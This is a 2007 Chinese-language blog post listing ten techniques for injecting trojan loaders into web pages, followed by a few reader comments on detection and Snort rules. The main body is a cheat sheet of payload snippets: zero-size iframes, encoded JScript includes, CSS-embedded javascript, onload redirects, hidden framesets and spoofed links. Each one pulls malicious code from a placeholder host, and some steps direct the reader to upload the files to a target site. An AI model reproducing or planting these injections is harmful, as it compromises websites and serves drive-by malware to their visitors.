Quote: http://anti-hacker.blogspot.com/2007/06/blog-post_22.html

1.  框架掛馬

以下是部份語法:

<iframe src=木馬網址 width=0 height=0></iframe>
 

2.  JScript 文件掛馬

首先將以下語法存檔為 xxx.js 然後將此文件利用各種方式上傳到目標處

document.write("<iframe width='0' height='0' src='木馬網址'></iframe>");
 

最後JScript 掛馬的語法為:

以下是部份語法:

<script language=javascript src=xxx.js></script>
 

3.  JScript 變型加密

以下是部份語法:

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt 可改成任何附檔名
 

4.  body 掛馬

以下是部份語法:

<body onload="window.location='木馬網址';"></body>
 

5.  隱藏掛馬

以下是部份語法:

top.document.body.innerHTML = top.document.body.innerHTML + ' <iframe src="http://www.xxx.com/muma.htm/"></iframe>';
 

6.  CSS 中掛馬

先將製作好的 muma.js 先利用各種方式上傳至目標處

以下是部份語法:

body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
 

7.  JAVA 掛馬

以下是部份語法:

<SCRIPT language=javascript>
window.open ("木馬網址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
 

8.  圖片偽裝

以下是部份語法:

<html>
<iframe src="網馬網址" height=0 width=0></iframe>
<img src="圖片網址">
</html>
 

9.  偽裝呼叫

以下是部份語法:

<frameset rows="444,0" cols="*">
<frame src="開啟的網頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網馬網址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
 

10.  欺騙超連結網址手法

以下是部份語法:

<a href="http://www.XYZ.com(迷惑他人超連結網址,故意顯示這個網址卻連向木馬網址)" onMouseOver="www_163_com(); return true;"> 網頁要顯示的內容 </a>
<SCRIPT Language="JavaScript">
function www_XYZ_com ()
{
var url="真正連的網頁木馬網址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>


最後修改日期: 2007 年 06 月 22 日

作者

留言

改網站目錄權限吧~~~

[Reply]

第3 種最難抓,因為沒法解碼……看到了也不知是啥東西
其他都還好辦,不過像圖嵌語法(還好)還有flash嵌語法的(無解)
以flv的最難解~~~
對了,你有沒有網頁注入的監視程式啊~

[Reply]

cross Reply:

1. 我沒有網頁注入的監視程式
2. 不過我會以 snort 為我的方案,但前提要先研究注入時的封包是什麼,才能來作 snort的 rules

~尚未去研究這個動作的人留^^"

[Reply]

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。